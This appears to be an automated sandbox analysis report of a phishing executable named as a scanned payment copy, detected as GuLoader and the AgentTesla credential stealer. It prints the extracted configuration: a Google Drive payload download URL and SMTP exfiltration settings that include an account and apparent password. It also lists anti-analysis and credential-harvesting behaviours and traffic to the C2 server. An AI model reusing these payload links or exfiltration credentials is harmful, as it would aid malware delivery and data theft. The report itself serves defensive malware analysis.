Loading ...

Play interactive tourEdit tour

Windows Analysis Report Scanned Payment Copy00024.scr.exe

Overview

General Information

Sample Name:Scanned Payment Copy00024.scr.exe
Analysis ID:530423
MD5:9ebaab853c410a3c6ef16ecf45739e8b
SHA1:67c221c5f1329829d7a808791dc030bf1288d2d7
SHA256:b24869692ba4efa8bb957cb2334ac798b570277c038db867db5a177a0e9a54ec
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Scanned Payment Copy00024.scr.exe (PID: 3820 cmdline: "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" MD5: 9EBAAB853C410A3C6EF16ECF45739E8B)
    • conhost.exe (PID: 4800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • CasPol.exe (PID: 5808 cmdline: "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 1396 cmdline: "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    • CasPol.exe (PID: 1428 cmdline: "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
      • conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trjramos.camacoil@gmail.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?expo"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.44493194249.0000000000F00000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: CasPol.exe PID: 1428JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: CasPol.exe PID: 1428JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000006.00000000.44493194249.0000000000F00000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?expo"}
            Source: conhost.exe.368.7.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gulnaz@furteksdokuma.com.tr@Gulnaz159753mail.furteksdokuma.com.trjramos.camacoil@gmail.com"}
            Multi AV Scanner detection for submitted fileShow sources
            Source: Scanned Payment Copy00024.scr.exeReversingLabs: Detection: 33%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012E5CC8 CryptUnprotectData,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012E6308 CryptUnprotectData,
            Source: Scanned Payment Copy00024.scr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.11.20:49808 version: TLS 1.2

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?expo
            Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 116.202.203.61 116.202.203.61
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072sq22koh6kdm9b8ejprnrarqv/1638197625000/10571010296728974958/*/1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-9o-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49817 -> 116.202.203.61:587
            Source: global trafficTCP traffic: 192.168.11.20:49817 -> 116.202.203.61:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: CasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpString found in binary or memory: http://OXDyLI.com
            Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49402362009.00000000214E0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49402362009.00000000214E0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400570275.000000002021D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400570275.000000002021D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmpString found in binary or memory: http://furteksdokuma.com.tr
            Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmpString found in binary or memory: http://mail.furteksdokuma.com.tr
            Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49402362009.00000000214E0000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400570275.000000002021D000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: CasPol.exe, 00000006.00000002.49394572073.000000001E018000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.45584258822.000000001CDE1000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49394924557.000000001E065000.00000004.00000001.sdmpString found in binary or memory: http://yjmpHNwxHQcW4vG64IN.com
            Source: CasPol.exe, 00000006.00000002.49394572073.000000001E018000.00000004.00000001.sdmpString found in binary or memory: http://yjmpHNwxHQcW4vG64IN.comt-
            Source: CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: CasPol.exe, 00000006.00000003.44649168355.0000000001174000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-9o-docs.googleusercontent.com/
            Source: CasPol.exe, 00000006.00000003.45582358032.000000000111A000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383620135.000000000111A000.00000004.00000020.sdmpString found in binary or memory: https://doc-08-9o-docs.googleusercontent.com/C=
            Source: CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072
            Source: CasPol.exe, 00000006.00000003.44653998064.000000000112E000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000003.44654319009.0000000001130000.00000004.00000001.sdmpString found in binary or memory: https://doc-08-9o-docs.googleusercontent.com/mond1
            Source: CasPol.exe, 00000006.00000003.45582109060.00000000010ED000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383368510.00000000010E9000.00000004.00000020.sdmp, CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: CasPol.exe, 00000006.00000002.49383099264.00000000010A6000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/s
            Source: CasPol.exe, 00000006.00000002.49382267477.0000000000B50000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49383368510.00000000010E9000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz
            Source: CasPol.exe, 00000006.00000003.44648752092.000000000112E000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXzL9yXV0dnDBBTu9pZE
            Source: CasPol.exe, 00000006.00000002.49394738859.000000001E039000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400309022.00000000201E8000.00000004.00000001.sdmp, CasPol.exe, 00000006.00000002.49400570275.000000002021D000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: CasPol.exe, 00000006.00000002.49393551309.000000001DF21000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ga7kf072sq22koh6kdm9b8ejprnrarqv/1638197625000/10571010296728974958/*/1iiNs60l202FEGNx6v3EUfjeUKv3OYnXz?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-08-9o-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.11.20:49808 version: TLS 1.2

            System Summary:

            barindex
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: Scanned Payment Copy00024.scr.exe
            Executable has a suspicious name (potential lure to open the executable)Show sources
            Source: Scanned Payment Copy00024.scr.exeStatic file information: Suspicious name
            Source: Scanned Payment Copy00024.scr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeCode function: 1_2_004047F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00E41130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00E43A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00E4BA58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00E44320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00E4C7B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00E43708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00E56D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00E507E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17DFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17DE4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17DD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17DC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17DCC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17DB4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17DA8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17D9C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17D84
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17D78
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17EF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17EEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17ED4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17EC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17EBC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17EA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E98
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E8C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E74
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E68
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E5C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E44
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E2C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E14
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17FC4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17FB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17FAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F94
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F88
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F7C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F64
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F58
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F4C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F34
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F1C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_00F17F04
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012AA4E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012AB8D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012ABB0A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012A5E70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012A8130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012A3330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012E9558
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012E2DA8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012EC8E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012E7BD8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012E1BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012EEE96
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012E8DA8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012EA5A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012E7330
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_012E6F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1CF64C48
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1CF61C08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1CF617C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1CF6A1E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1CF663D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1DD75E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1DD746C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1DD75D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 6_2_1DD76AF1
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44676680374.0000000000424000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDybblsbro.exe vs Scanned Payment Copy00024.scr.exe
            Source: Scanned Payment Copy00024.scr.exe, 00000001.00000002.44678368092.0000000002360000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDybblsbro.exeFE2XCorps vs Scanned Payment Copy00024.scr.exe
            Source: Scanned Payment Copy00024.scr.exeBinary or memory string: OriginalFilenameDybblsbro.exe vs Scanned Payment Copy00024.scr.exe
            Source: Scanned Payment Copy00024.scr.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: edgegdi.dll
            Source: Scanned Payment Copy00024.scr.exeReversingLabs: Detection: 33%
            Source: Scanned Payment Copy00024.scr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: unknownProcess created: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exe"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Scanned Payment Copy00024.scr.exeFile created: C:\Users\user\AppData\Local\Temp\~DFEFF002A05981B24C.TMPJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:368:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:120:WilError_03
